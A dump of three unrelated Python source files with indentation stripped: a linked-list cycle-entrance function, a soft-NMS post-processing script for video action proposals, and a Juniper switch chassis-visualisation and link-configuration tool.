fast = fast.next.next
if slow == fast:
return slow
return None
if head is None:
return None
# If there is a cycle, the fast/slow pointers will intersect at some
# node. Otherwise, there is no cycle, so we cannot find an entrance to
# a cycle.
intersect = getIntersect(head)
if intersect is None:
return None
# To find the entrance to the cycle, we have two pointers traverse at
# the same speed -- one from the front of the list, and the other from
# the point of intersection.
ptr1 = head
ptr2 = intersect
while ptr1 != ptr2:
ptr1 = ptr1.next
ptr2 = ptr2.next
return ptr1
|
991,671 | 7133aabfd2787ec66aa09f4500f8677f1595752d | import argparse
import json
import multiprocessing as mp
import os
import threading
import numpy as np
import pandas as pd
import tqdm
from utils.utils import getDatasetDict
from utils.read_config import Config
config = Config()
""" Define parser """
parser = argparse.ArgumentParser()
parser.add_argument('top_number', type=int, nargs='?', default=100)
parser.add_argument('-t', '--thread', type=int, nargs='?', default=16)
args = parser.parse_args()
""" Number of proposal needed to keep for every video"""
top_number = args.top_number
""" Number of thread for post processing"""
thread_num = args.thread
def IOU(s1, e1, s2, e2):
"""
Calculate IoU of two proposals
:param s1: starting point of A proposal
:param e1: ending point of A proposal
:param s2: starting point of B proposal
:param e2: ending point of B proposal
:return: IoU value
"""
if (s2 > e1) or (s1 > e2):
return 0
Aor = max(e1, e2) - min(s1, s2)
Aand = min(e1, e2) - max(s1, s2)
return float(Aand) / Aor
def softNMS(df):
"""
soft-NMS for all proposals
:param df: input dataframe
:return: dataframe after soft-NMS
"""
tstart = list(df.xmin.values[:])
tend = list(df.xmax.values[:])
tscore = list(df.score.values[:])
rstart = []
rend = []
rscore = []
while len(tscore) > 1 and len(rscore) < top_number:
max_index = tscore.index(max(tscore))
tmp_start = tstart[max_index]
tmp_end = tend[max_index]
tmp_score = tscore[max_index]
rstart.append(tmp_start)
rend.append(tmp_end)
rscore.append(tmp_score)
tstart.pop(max_index)
tend.pop(max_index)
tscore.pop(max_index)
tstart = np.array(tstart)
tend = np.array(tend)
tscore = np.array(tscore)
tt1 = np.maximum(tmp_start, tstart)
tt2 = np.minimum(tmp_end, tend)
intersection = tt2 - tt1
duration = tend - tstart
tmp_width = tmp_end - tmp_start
iou = intersection / (tmp_width + duration - intersection).astype(np.float)
idxs = np.where(iou > 0.5 + 0.25 * tmp_width)[0]
tscore[idxs] = tscore[idxs] * np.exp(-np.square(iou[idxs]) / 0.95)
tstart = list(tstart)
tend = list(tend)
tscore = list(tscore)
newDf = pd.DataFrame()
newDf['score'] = rscore
newDf['xmin'] = rstart
newDf['xmax'] = rend
return newDf
def sub_processor(lock, pid, video_list):
"""
Define job for every subprocess
:param lock: threading lock
:param pid: sub processor id
:param video_list: video list assigned to each subprocess
:return: None
"""
text = 'processor %d' % pid
with lock:
progress = tqdm.tqdm(
total=len(video_list),
position=pid,
desc=text
)
for i in range(len(video_list)):
video_name = video_list[i]
""" Read result csv file """
df = pd.read_csv(os.path.join(config.post_csv_load_dir, video_name + ".csv"))
""" Calculate final score of proposals """
df['score'] = df.iou.values[:] * df.start.values[:] * df.end.values[:]
if len(df) > 1:
df = softNMS(df)
df = df.sort_values(by="score", ascending=False)
video_info = video_dict[video_name]
video_duration = video_info["duration_second"]
proposal_list = []
for j in range(min(top_number, len(df))):
tmp_proposal = {}
tmp_proposal["score"] = df.score.values[j]
tmp_proposal["segment"] = [max(0, df.xmin.values[j]) * video_duration,
min(1, df.xmax.values[j]) * video_duration]
tmp_proposal["label"] = "行走"
# tmp_proposal["label"] = "Fun sliding down"
proposal_list.append(tmp_proposal)
result_dict[video_name] = proposal_list
with lock:
progress.update(1)
with lock:
progress.close()
if __name__ == '__main__':
print("starting post processing")
train_dict, val_dict, test_dict = getDatasetDict(config, config.video_info_file)
print(len(test_dict.keys()))
if config.mode == 'validation':
video_dict = val_dict
else:
video_dict = test_dict
output_file = config.post_json_save_path
print('save to :{}'.format(output_file))
video_list = list(video_dict.keys())
""" Post processing using multiprocessing
"""
global result_dict
result_dict = mp.Manager().dict()
processes = []
lock = threading.Lock()
total_video_num = len(video_list)
per_thread_video_num = total_video_num // thread_num
for i in range(thread_num):
if i == thread_num - 1:
sub_video_list = video_list[i * per_thread_video_num:]
else:
sub_video_list = video_list[i * per_thread_video_num: (i + 1) * per_thread_video_num]
p = mp.Process(target=sub_processor, args=(lock, i, sub_video_list))
p.start()
processes.append(p)
for p in processes:
p.join()
""" Save result json file """
result_dict = dict(result_dict)
with open(output_file, 'w') as outfile:
json.dump(result_dict, outfile)
print("result json file saved in ", output_file)
|
991,672 | 0963e755c4cd75915a988af41db7152cd7d93447 | # File: jtemp.py
# Author: Tyler Jordan
# Modified: 8/28/2015
# Purpose: Assist CBP engineers with Juniper configuration tasks
import sys,fileinput,code,re,csv
import utility
import math
import pprint
import re
from utility import *
from storage import *
from jnpr.junos import Device
from jnpr.junos.utils.config import Config
from lxml import etree
from getpass import getpass
# Global Variables
csv_path = '.\\csv\\'
template_path = '.\\template\\'
pp = pprint.PrettyPrinter(indent=2)
wan_router = {}
lan_router = {}
link_map = {}
# Display single chassis systems and their components. Side can be "Front", "Rear", or "Both".
def displayChassisHardware(hostname, viewside='Both'):
if lan_router.has_key(hostname):
# Get the hostname chassis type, determine if single or VC
chassis_mod = lan_router[hostname]['chassis_mod']
# Display Hostname
print "Hostname: " + hostname
# Virtual Chassis Views
if chassis_mod == 'Virtual_Chassis':
if viewside == 'Front' or viewside == 'Both':
print "Side: Front"
for fpc in lan_router[hostname]['interfaces']['physical'].keys():
chassis_mod = lan_router[hostname]['interfaces']['physical'][fpc]['fpc_mod']
chassisStackView(hostname, fpc, chassis_mod, 'Front')
if viewside == 'Rear' or viewside == 'Both':
print "Side: Rear"
for fpc in lan_router[hostname]['interfaces']['physical'].keys():
chassis_mod = lan_router[hostname]['interfaces']['physical'][fpc]['fpc_mod']
chassisStackView(hostname, fpc, chassis_mod, 'Rear')
# Modular Chassis Views
elif chassis_mod == 'EX6210':
chassis_side = "Front"
print "Side: Front"
chassisModularView(hostname, chassis_mod, chassis_side)
# Stackable Chassis Views
else:
fpc = 0
if viewside == 'Front' or viewside == 'Both':
print "Side: Front"
chassisStackView(hostname, fpc, chassis_mod, "Front")
if viewside == 'Rear' or viewside == 'Both':
print "Side: Rear"
chassisStackView(hostname, fpc, chassis_mod, "Rear")
else:
print "Hostname: " + hostname
print "--- No Image Available ---"
# Assemble and print the contents of device(s)
def assembleViewPrint(chassisWidth, hostname, fpc, myList, onPorts, onLabels, onBorders):
pic = 0
if onPorts:
#'ports', 's1', 'vb1', 's1' 'pic2', 's1', 'vb1', 's1', 'e', '0'
#print myList
for loopNum in range(1, 5):
theLine = '|'
myport = 0 # new addition
for prtcmd in myList:
if loopNum == 1:
# Matches a port
if re.match(r'^\d{1,3}$', prtcmd) or re.match(r'^\d{1}p\d{1,3}$', prtcmd):
theLine += "-----+"
# A series of ports starting
elif prtcmd == 'e':
theLine += "+"
# A space or spaces
elif re.match(r'^s\d{1,3}$', prtcmd):
#myspace = re.match(r'^s\d{1,3}$', prtcmd).group(0)
numlist = prtcmd.split('s')
theLine += " "*int(numlist[1])
# A vertial border or borders
elif re.match(r'^vb\d{1,3}$', prtcmd):
numlist = prtcmd.split('b')
theLine += "|"*int(numlist[1])
elif loopNum == 2:
# Matches native chassis ports
if re.match(r'^\d{1,3}$', prtcmd):
myport = int(prtcmd)
#print "FPC: " + str(fpc) + " PIC: " + str(pic) + " PORT: " + str(myport)
# NEED TO REVERSE PRINTING EVENTUALLY
if lan_router[hostname]['interfaces']['physical'][fpc][pic].has_key(myport):
if lan_router[hostname]['interfaces']['physical'][fpc][pic][myport]['is_linked']:
theLine += "X "
else:
theLine += " "
else:
print "ERROR - NO MATCH - NATIVE!"
#pp.pprint(lan_router[hostname])
# Determine if port is 1 digit or 2 digits so ports print correctly
if myport > 9:
theLine += str(myport) + " |"
else:
theLine += str(myport) + " |"
# Match expansion module ports
elif re.match(r'^\d{1}p\d{1,3}$', prtcmd):
numlist = prtcmd.split('p')
modpic = int(numlist[0])
myport = int(numlist[1])
#print "FPC: " + str(fpc) + " PIC: " + str(pic) + " PORT: " + str(myport)
# NEED TO REVERSE PRINTING EVENTUALLY
if lan_router[hostname]['interfaces']['physical'][fpc][modpic].has_key(myport):
if lan_router[hostname]['interfaces']['physical'][fpc][modpic][myport]['is_linked']:
theLine += "X "
else:
theLine += " "
else:
print "ERROR - NO MATCH - EXPAN!"
# Determine if port is 1 digit or 2 digits so ports print correctly
if myport > 9:
theLine += str(myport) + " |"
else:
theLine += str(myport) + " |"
# A series of ports starting
elif prtcmd == 'e':
theLine += "|"
# A space or spaces
elif re.match(r'^s\d{1,3}$', prtcmd):
numlist = prtcmd.split('s')
theLine += " "*int(numlist[1])
# A vertial border or borders
elif re.match(r'^vb\d{1,3}$', prtcmd):
numlist = prtcmd.split('b')
theLine += "|"*int(numlist[1])
# Prevent this term from being printed
elif re.match(r'bpic\d{1}$', prtcmd):
# Do nothing
pass
# This should only be hit with the hostnamename
elif prtcmd != 'end':
theLine += prtcmd
elif loopNum == 3:
# Matches native chassis ports
#print "PRTCMD: " + prtcmd
if re.match(r'^\d{1,3}$', prtcmd):
myport = int(prtcmd)
#print "FPC: " + str(fpc) + " PIC: " + str(pic) + " PORT: " + str(myport)
# NEED TO REVERSE PRINTING EVENTUALLY
if myport in lan_router[hostname]['interfaces']['physical'][fpc][pic]:
if "access_mode" in lan_router[hostname]['interfaces']['physical'][fpc][pic][myport]:
access_mode = lan_router[hostname]['interfaces']['physical'][fpc][pic][myport]['access_mode']
theLine += access_mode + " "*(5 - (len(access_mode))) + "|"
else:
theLine += " |"
else:
print "ERROR - NO MATCH - NATIVE!"
#pp.pprint(lan_router[hostname])
# Match expansion module ports
elif re.match(r'^\d{1}p\d{1,3}$', prtcmd):
numlist = prtcmd.split('p')
modpic = int(numlist[0])
myport = int(numlist[1])
#lan_router[hostname]['interfaces']['physical'][fpc][pic][myport]['access_mode'] = "VCP"
#print "FPC: " + str(fpc) + " PIC: " + str(pic) + " PORT: " + str(myport)
#print "Access Mode: " + lan_router[hostname]['interfaces']['physical'][fpc][pic][myport]['access_mode']
#pp.pprint(lan_router[hostname]['interfaces']['physical'][fpc][modpic][myport])
# NEED TO REVERSE PRINTING EVENTUALLY
if myport in lan_router[hostname]['interfaces']['physical'][fpc][modpic]:
#print "First IF..."
if "access_mode" in lan_router[hostname]['interfaces']['physical'][fpc][modpic][myport]:
#print "Second IF..."
access_mode = lan_router[hostname]['interfaces']['physical'][fpc][modpic][myport]['access_mode']
theLine += access_mode + " "*(5 - (len(access_mode))) + "|"
else:
theLine += " |"
else:
print "ERROR - NO MATCH - EXPAN!"
#pp.pprint(lan_router[hostname]['interfaces']['physical'][fpc][modpic][myport])
# A port
#if re.match(r'^\d{1,3}$', prtcmd) or re.match(r'^\d{1}p\d{1,3}$', prtcmd):
# theLine += " |"
# A series of ports starting
elif prtcmd == 'e':
theLine += "|"
# A space or spaces
elif re.match(r'^s\d{1,3}$', prtcmd):
numlist = prtcmd.split('s')
theLine += " "*int(numlist[1])
# A vertial border or borders
elif re.match(r'^vb\d{1,3}$', prtcmd):
numlist = prtcmd.split('b')
theLine += "|"*int(numlist[1])
if loopNum == 4:
# A port
if re.match(r'^\d{1,3}$', prtcmd) or re.match(r'^\d{1}p\d{1,3}$', prtcmd):
theLine += "-----+"
# A series of ports starting
elif prtcmd == 'e':
theLine += "+"
# A space or spaces
elif re.match(r'^s\d{1,3}$', prtcmd):
#myspace = re.match(r'^s\d{1,3}$', prtcmd).group(0)
numlist = prtcmd.split('s')
theLine += " "*int(numlist[1])
# A vertial border or borders
elif re.match(r'^vb\d{1,3}$', prtcmd):
numlist = prtcmd.split('b')
theLine += "|"*int(numlist[1])
# A PIC border
elif re.match(r'bpic\d{1}$', prtcmd):
numlist = prtcmd.split('c')
theLine += "+-----------PIC" + " " + numlist[1] + "-----------+"
if prtcmd == 'end':
rem = chassisWidth - len(theLine)
theLine += " "*(rem - 1) + "|"
# Display the whole line on the screen
print theLine
#'labels', 's1', 'pic2', 'sX', '32x 1G SFP', 'sX', 'auxpic0', 'end'
elif onLabels:
#print "On Labels"
#print myList
theLine = '|'
for prtcmd in myList:
# A space or spaces
if re.match(r'^s\d{1,3}$', prtcmd):
numlist = prtcmd.split('s')
theLine += " "*int(numlist[1])
# A vertial border or borders
elif re.match(r'^vb\d{1,3}$', prtcmd):
numlist = prtcmd.split('b')
theLine += "|"*int(numlist[1])
# Dynamic spacing function so SLOT looks right
elif re.match(r'^dyns\d{1,3}$', prtcmd):
numlist = prtcmd.split('s')
rem = int(numlist[1]) - len(theLine)
theLine += " "*rem
elif prtcmd == 'end':
rem = chassisWidth - len(theLine)
theLine += " "*(rem - 1) + "|"
else:
theLine += prtcmd
# Display the whole line on the screen
print theLine
# 'border', 's1', 'cb1', 'hb29', 'cb1', 'end'
elif onBorders:
#print "On Borders"
#print myList
theLine = '|'
for prtcmd in myList:
# A corner border or borders
if re.match(r'^cb\d{1,3}$', prtcmd):
numlist = prtcmd.split('b')
theLine += "+"*int(numlist[1])
# A horizontal border or borders
elif re.match(r'^hb\d{1,3}$', prtcmd):
numlist = prtcmd.split('b')
theLine += "-"*int(numlist[1])
# A space or spaces
elif re.match(r'^s\d{1,3}$', prtcmd):
numlist = prtcmd.split('s')
theLine += " "*int(numlist[1])
# A vertial border or borders
elif re.match(r'^vb\d{1,3}$', prtcmd):
numlist = prtcmd.split('b')
theLine += "|"*int(numlist[1])
# Add FPC info to print out
elif re.match(r'^fpc$', prtcmd):
theLine += "FPC " + str(fpc)
# Catch anything else (text)
elif prtcmd != 'end':
theLine += prtcmd
# Display the whole int on the screen
if prtcmd == 'end':
rem = chassisWidth - len(theLine)
theLine += " "*(rem - 1) + "|"
# Display the whole line on the screen
print theLine
else:
print "Unknown Line"
# Creates and displays the images
def chassisModularView(hostname, chassis_mod, chassis_side):
print "Router Model: " + chassis_mod
#pp.pprint(lan_router[hostname])
chassisWidth = 162
chassisTop = "+" + "-"*160 + "+"
# Create top of chassis
print chassisTop
# Start looping through chassis mappings
for slot in sorted(visual_chassis[chassis_mod][chassis_side].keys()):
# Determine FPC
fpc = int(slot.split('S')[1])
for tier in sorted(visual_chassis[chassis_mod][chassis_side][slot].keys()):
myList = []
theLine = ""
onPorts = False
onLabels = False
onBorders = False
# Loop through each tier
for prtcmd in visual_chassis[chassis_mod][chassis_side][slot][tier]:
if prtcmd == 'ports':
onPorts = True
elif prtcmd == 'labels':
onLabels = True
elif prtcmd == 'border':
onBorders = True
# Keep checking for slots
elif prtcmd == 'slot':
# If a module is in this slot...
#print "Matched slot!"
#print "FPC = " + str(fpc)
if lan_router[hostname]['interfaces']['physical'].has_key(fpc):
#print "Inside Loop"
fpc_mod = lan_router[hostname]['interfaces']['physical'][fpc]['fpc_mod']
#print "FPC: " + fpc_mod
for fpccmd in visual_modules[fpc_mod][tier]:
myList.append(fpccmd)
# If a module is not in this slot...
else:
# Could use the empty slot module...
#print "BLANK SLOT"
fpc_mod = "EX6200-BLANK"
for fpccmd in visual_modules[fpc_mod][tier]:
myList.append(fpccmd)
# Add Slot Number to Chassis
elif prtcmd == 'slot_num':
myList.append("SLOT " + str(fpc))
else:
myList.append(prtcmd)
# Assembles and prints out content of device(s)
assembleViewPrint(chassisWidth, hostname, fpc, myList, onPorts, onLabels, onBorders)
# Print bottom border of chassis
print chassisTop
# Creates and displays the images
def chassisStackView(hostname, fpc, chassis_mod, chassis_side):
chassisWidth = 180
chassisTop = "+" + "-"*178 + "+"
# Create top of chassis
print chassisTop
# Start looping through chassis mappings
for tier in sorted(visual_chassis[chassis_mod][chassis_side].keys()):
myList = []
loopNum = 0
theLine = ""
onPorts = False
onLabels = False
onBorders = False
# Loop through each tier
for prtcmd in visual_chassis[chassis_mod][chassis_side][tier]:
if prtcmd == 'ports':
onPorts = True
elif prtcmd == 'labels':
onLabels = True
elif prtcmd == 'border':
onBorders = True
# Keep checking for PICs
elif re.match(r'^pic\d{1}$', prtcmd):
# Extract the PIC number and convert to an integer
pic = int(prtcmd.split('c')[1])
# If a module is in this slot...
if lan_router[hostname]['interfaces']['physical'][fpc].has_key(pic):
#print "PIC Exists"
pic_mod = lan_router[hostname]['interfaces']['physical'][fpc][pic]['module_mod']
#pic_mod += " (" + str(pic) + ")"
#print "PIC Module: " + pic_mod
for piccmd in visual_modules[pic_mod][tier]:
if re.match(r'^\d{1,3}$', piccmd):
piccmd = str(pic) + 'p' + piccmd
myList.append(piccmd)
else:
myList.append(piccmd)
# If a module is not in this slot...
else:
# Could use the empty slot module...
pic_mod = "EX4300-BLANK"
for piccmd in visual_modules[pic_mod][tier]:
myList.append(piccmd)
#print "PIC Slot Empty"
# for piccmd in visual_modules[module_mod]
elif re.match(r'^auxpic\d{1}$', prtcmd):
pic = int(prtcmd.split('c')[1])
if lan_router[hostname]['interfaces']['physical'][fpc][pic]['has_aux']:
#print "Aux PIC Exists"
pic_mod = lan_router[hostname]['interfaces']['physical'][fpc][pic]['aux_mod']
#pic_mod += " (" + str(pic) + ")"
#print "PIC Module: " + pic_mod
for piccmd in visual_modules[pic_mod][tier]:
if re.match(r'^\d{1,3}$', piccmd):
piccmd = str(pic) + 'p' + piccmd
myList.append(piccmd)
else:
myList.append(piccmd)
else:
print "Error: PIC not in router"
else:
myList.append(prtcmd)
# Assembles and prints out content of device(s)
assembleViewPrint(chassisWidth, hostname, fpc, myList, onPorts, onLabels, onBorders)
# Print bottom border of chassis
print chassisTop
# Adds the interfaces that are common to this chassis, includes native and built-in interfaces
def addNativeInterfaces(hostname, chassis_mod, is_vc, fpc, pic):
# Get number of ports for this model
port_num = system_model[chassis_mod]['port_num']
# Build out base of interface heirarchy
lan_router[hostname]['interfaces']['physical'].update({ fpc : {} })
lan_router[hostname]['interfaces']['physical'][fpc].update({ 'fpc_mod' : chassis_mod })
# Configure default VC priority, if system is a VC
if is_vc:
if fpc == 0 or fpc == 1:
lan_router[hostname]['interfaces']['physical'][fpc].update({ 'vc_priority' : 255 })
elif fpc == 2: lan_router[hostname]['interfaces']['physical'][fpc].update({ 'vc_priority' : 10 })
elif fpc == 3: lan_router[hostname]['interfaces']['physical'][fpc].update({ 'vc_priority' : 9 })
elif fpc == 4: lan_router[hostname]['interfaces']['physical'][fpc].update({ 'vc_priority' : 8 })
elif fpc == 5: lan_router[hostname]['interfaces']['physical'][fpc].update({ 'vc_priority' : 7 })
elif fpc == 6: lan_router[hostname]['interfaces']['physical'][fpc].update({ 'vc_priority' : 6 })
elif fpc == 7: lan_router[hostname]['interfaces']['physical'][fpc].update({ 'vc_priority' : 5 })
elif fpc == 8: lan_router[hostname]['interfaces']['physical'][fpc].update({ 'vc_priority' : 4 })
elif fpc == 9: lan_router[hostname]['interfaces']['physical'][fpc].update({ 'vc_priority' : 3 })
# Configure the PICs
lan_router[hostname]['interfaces']['physical'][fpc].update({ pic : {} })
lan_router[hostname]['interfaces']['physical'][fpc][pic].update({ 'module_type' : 'native' })
lan_router[hostname]['interfaces']['physical'][fpc][pic].update({ 'module_mod' : chassis_mod })
lan_router[hostname]['interfaces']['physical'][fpc][pic].update({ 'has_aux' : False })
# Create ports
for port in range(0, port_num):
lan_router[hostname]['interfaces']['physical'][fpc][pic].update({ port : {} })
lan_router[hostname]['interfaces']['physical'][fpc][pic][port].update({ 'port' : port })
lan_router[hostname]['interfaces']['physical'][fpc][pic][port].update({ 'is_linked' : False })
lan_router[hostname]['interfaces']['physical'][fpc][pic][port].update({ 'is_bundled' : False })
print("Successfully added NATIVE interfaces...\n")
# Set system hostname
def setSystemHostname(oldhost=""):
newhost = ""
if oldhost:
# For changing hostname after initial config
print "The current hostname is: " + oldhost
newhost = getInputAnswer("Enter hostname")
while not isUniqueHostname(newhost):
newhost = getInputAnswer("Enter hostname")
lan_router[newhost] = lan_router[oldhost]
del lan_router[oldhost]
else:
# For during initial configuration
newhost = getInputAnswer("Enter hostname")
while not isUniqueHostname(newhost):
newhost = getInputAnswer("Enter hostname")
lan_router.update({ newhost : {} })
return newhost
# Create basic system configuration
def setSystemCommon():
# Set System Type (MDF or IDF)
system_type = ""
hostname = None
question = "Select system type"
option = [ "MDF", "IDF", "Go Back" ]
selection = getOptionTRAnswer(question, option)
if selection == 0:
system_type = "mdf"
# Set Hostname
hostname = setSystemHostname()
# Set System Info
lan_router[hostname].update({ 'system_type' : system_type })
elif selection == 1:
system_type = "idf"
# Set Hostname
hostname = setSystemHostname()
# Set System Info
lan_router[hostname].update({ 'system_type' : system_type })
return hostname
# Create actual module interfaces
def addModuleInterfaces(hostname, fpc, pic, mod):
# Get the number of ports for this module
port_num = modular_model[mod]['port_num']
# Specifically match this module, its interfaces are added onto the end of FPC 0, 32 - 35
if mod == 'EX4300-UM-4XSFP':
# Create PIC
if not lan_router[hostname]['interfaces']['physical'][fpc].has_key(pic):
lan_router[hostname]['interfaces']['physical'][fpc].update({ pic : {} })
if modular_model[mod]['built_in']:
lan_router[hostname]['interfaces']['physical'][fpc][pic].update({ 'aux_type' : 'builtin' })
else:
lan_router[hostname]['interfaces']['physical'][fpc][pic].update({ 'aux_type' : 'expan' })
lan_router[hostname]['interfaces']['physical'][fpc][pic].update({ 'has_aux' : True })
lan_router[hostname]['interfaces']['physical'][fpc][pic].update({ 'aux_mod' : mod })
# Create PIC ports
for port in range(32, 36):
lan_router[hostname]['interfaces']['physical'][fpc][pic].update({ port : {} })
lan_router[hostname]['interfaces']['physical'][fpc][pic][port].update({ 'port' : port })
lan_router[hostname]['interfaces']['physical'][fpc][pic][port].update({ 'is_linked' : False })
lan_router[hostname]['interfaces']['physical'][fpc][pic][port].update({ 'is_bundled' : False })
lan_router[hostname]['interfaces']['physical'][fpc][pic][port].update({ 'is_aux' : True })
lan_router[hostname]['interfaces']['physical'][fpc][pic][port].update({ 'access_mode' : ' ' })
# All other modules hit here
else:
# Create PIC
lan_router[hostname]['interfaces']['physical'][fpc].update({ pic : {} })
if modular_model[mod]['built_in']:
lan_router[hostname]['interfaces']['physical'][fpc][pic].update({ 'module_type' : 'builtin' })
else:
lan_router[hostname]['interfaces']['physical'][fpc][pic].update({ 'module_type' : 'expan' })
lan_router[hostname]['interfaces']['physical'][fpc][pic].update({ 'has_aux' : False })
lan_router[hostname]['interfaces']['physical'][fpc][pic].update({ 'module_mod' : mod })
# Create PIC ports
for port in range(0, port_num):
lan_router[hostname]['interfaces']['physical'][fpc][pic].update({ port : {} })
lan_router[hostname]['interfaces']['physical'][fpc][pic][port].update({ 'port' : port })
lan_router[hostname]['interfaces']['physical'][fpc][pic][port].update({ 'is_linked' : False })
lan_router[hostname]['interfaces']['physical'][fpc][pic][port].update({ 'is_bundled' : False })
lan_router[hostname]['interfaces']['physical'][fpc][pic][port].update({ 'access_mode' : ' ' })
print("Successfully added " + mod + " to slot " + str(pic) + " ...\n")
# Check if slot is used
def slotUsed(hostname, fpc, pic):
if lan_router[hostname]['interfaces']['physical'][fpc].has_key(pic):
print "Slot is USED"
return True
else:
print "Slot is NOT USED"
return False
###############################
# ========== LINKS ========== #
###############################
# Check user input and see if link is valid/unused
def parseInterface(intf):
parts = {}
if re.match(r'^\d{1,2}\/\d{1,2}\/\d{1,2}$', intf):
portLoc = intf.split('/')
parts = {
'fpc' : int(portLoc[0]),
'pic' : int(portLoc[1]),
'port' : int(portLoc[2])
}
return parts
# Check if an interface exists
def isInterfaceExists(intf, hostname):
portLoc = parseInterface(intf)
if lan_router[hostname]['interfaces']['physical'].has_key(portLoc['fpc']):
if lan_router[hostname]['interfaces']['physical'][portLoc['fpc']].has_key(portLoc['pic']):
if lan_router[hostname]['interfaces']['physical'][portLoc['fpc']][portLoc['pic']].has_key(portLoc['port']):
if lan_router[hostname]['interfaces']['physical'][portLoc['fpc']][portLoc['pic']].has_key('module_mod'):
#print "Mod of PIC is: " + lan_router[hostname]['interfaces']['physical'][portLoc['fpc']][portLoc['pic']]['module_mod']
pass
elif lan_router[hostname]['interfaces']['physical'][portLoc['fpc']].has_key('fpc_mod'):
#print "Mod of FPC is: " + lan_router[hostname]['interfaces']['physical'][portLoc['fpc']]['fpc_mod']
pass
return True
else:
print "PORT was invalid"
return False
else:
print "PIC was invalid"
return False
else:
print "FPC was invalid"
return False
# Check if an interface is assigned to a link (true) or not (false)
def isInterfaceAvailable(intf, hostname):
portLoc = parseInterface(intf)
if isInterfaceExists(intf, hostname):
if lan_router[hostname]['interfaces']['physical'][portLoc['fpc']][portLoc['pic']][portLoc['port']]['is_linked']:
return False
else:
return True
else:
return False
# Get a parameter
def getParameter(hostname, iparams, parameter):
results = []
# Check if an "aux" pic exists
if lan_router[hostname]['interfaces']['physical'][iparams[0]].has_key('aux'):
# Check if this interface is the appropriate one
if lan_router[hostname]['interfaces']['physical'][iparams[0]]['aux'].has_key(iparams[1]):
pass
if lan_router[hostname]['interfaces']['physical'][iparams[0]].has_key(iparams[1]):
pass
# Create a P2P link
def createLink():
hosts = selectDevices('both')
intfsValid = False
links = {}
firstLoopValid = False
linkNum = 0
one = 1
two = 2
speedOptions = []
# Loop on hosts
for hostname in hosts:
linkNum += one
# Display chassis
displayChassisHardware(hostname, "Both")
# Display menu to ask for interface
print "Checking host: " + hostname
intfsValid = False
# Check if this host is a lan host
if hostname in lan_router:
while not intfsValid:
myIntf = getInputAnswer("Enter the " + hostname + " side interface to use")
# If the interface exists
if isInterfaceExists(myIntf, hostname):
intfsValid = True
# GET possible port properties and ADD to dictionary
props = parseInterface(myIntf)
# Candidate Interface Dictionary
links.update({ linkNum : {} })
links[linkNum].update({ 'Hostname' : hostname })
links[linkNum].update({ 'PosSpeed' : [] })
links[linkNum].update({ 'PosMedia' : [] })
links[linkNum].update({ 'FPC' : props['fpc'] })
links[linkNum].update({ 'PIC' : props['pic'] })
links[linkNum].update({ 'PORT' : props['port'] })
# Check if this interface is already linked...
if lan_router[hostname]['interfaces']['physical'][props['fpc']][props['pic']][props['port']]['is_linked']:
print "Interface " + str(props['fpc']) + '/' + str(props['pic']) + '/' + str(props['port']) + " already linked!"
intfsValid = False
# Checks if this port is in a expansion module, get model from PIC
# Check if this is an auxiliary port
elif lan_router[hostname]['interfaces']['physical'][props['fpc']][props['pic']].has_key('has_aux') and lan_router[hostname]['interfaces']['physical'][props['fpc']][props['pic']][props['port']].has_key('is_aux'):
model = lan_router[hostname]['interfaces']['physical'][props['fpc']][props['pic']]['aux_mod']
#print "Aux Port: " + model + " (PIC)"
for speed in modular_model[model]['speed']:
links[linkNum]['PosSpeed'].append(speed)
for media in modular_model[model]['intf_type']:
links[linkNum]['PosMedia'].append(media)
# Check if this is anything else, but a native interface
elif lan_router[hostname]['interfaces']['physical'][props['fpc']][props['pic']]['module_type'] != 'native':
# If this is a non-auxiliary port
model = lan_router[hostname]['interfaces']['physical'][props['fpc']][props['pic']]['module_mod']
#print "Expan Port: " + model + " (PIC)"
if modular_model.has_key(model):
for speed in modular_model[model]['speed']:
links[linkNum]['PosSpeed'].append(speed)
for media in modular_model[model]['intf_type']:
links[linkNum]['PosMedia'].append(media)
else:
for speed in system_model[model]['speed']:
links[linkNum]['PosSpeed'].append(speed)
for media in system_model[model]['intf_type']:
links[linkNum]['PosMedia'].append(media)
# Otherwise port is in a native module, get model from FPC
else:
model = lan_router[hostname]['interfaces']['physical'][props['fpc']]['fpc_mod']
#print "Native Port: " + model + " (FPC)"
for speed in system_model[model]['speed']:
links[linkNum]['PosSpeed'].append(speed)
for media in system_model[model]['intf_type']:
links[linkNum]['PosMedia'].append(media)
#print "***** PPRINT *****"
#pp.pprint(links)
else:
print "Invalid link..."
intfsValid = False
# If not a lan host...
else:
print "Host " + hostname + " is a WAN device."
question = "Enter the " + hostname + " side interface to use"
option = wan_router[hostname]['intf_name']
selection = getOptionAnswer(question, option)
# Candidate Interface Dictionary
links.update({ linkNum : {} })
links[linkNum].update({ 'Hostname' : hostname })
links[linkNum].update({ 'PORT' : selection })
intfsValid = True
isMediaValid = False
isSpeedValid = False
print "Interfaces are both valid"
print "Checking interfaces..."
# Checks if host one is a wan_router...
if links[one]['Hostname'] in wan_router:
for speedOne in links[two]['PosSpeed']:
speedOptions.append(speedOne)
# Choose speed from lan_router options
question = "Choose a speed"
selection = getOptionAnswer(question, speedOptions)
# Select the speed for this link
if selection != "Go Back":
print "Speed selected is: " + selection
# Add the link
links[linkNum].update({ 'ActSpeed' : selection })
if len(links[two]['PosMedia']) > 1:
if links[two]['ActSpeed'] == '10G':
links[linkNum].update({ 'ActMedia' : 'SFP+' })
else:
links[linkNum].update({ 'ActMedia' : 'SFP' })
addLinks(links)
# Checks if host two is a wan_router...
elif links[two]['Hostname'] in wan_router:
for speedTwo in links[one]['PosSpeed']:
speedOptions.append(speedTwo)
# Choose speed from lan_router options
question = "Choose a speed"
selection = getOptionAnswer(question, speedOptions)
# Select the speed for this link
if selection != "Go Back":
print "Speed selected is: " + selection
# Add the link
links[linkNum].update({ 'ActSpeed' : selection })
if len(links[one]['PosMedia']) > 1:
if links[one]['ActSpeed'] == '10G':
links[linkNum].update({ 'ActMedia' : 'SFP+' })
else:
links[linkNum].update({ 'ActMedia' : 'SFP' })
addLinks(links)
# Otherwise they are both lan_routers...
else:
if links[one]['Hostname'] != links[two]['Hostname']:
#print 'Hostnames are unique...'
for mediaOne in links[one]['PosMedia']:
#print "Media 1"
for mediaTwo in links[two]['PosMedia']:
#print "Media 2"
if links[one]['PosMedia'] == links[two]['PosMedia']:
#print "Match! -> Link 1: " + mediaOne + " and Link 2: " + mediaTwo
isMediaValid = True
break
elif re.match(r'^SFP\+?$', mediaOne) and re.match(r'^SFP\+?$', mediaTwo):
#print "Match! -> Link 1: " + mediaOne + " and Link 2: " + mediaTwo
isMediaValid = True
break
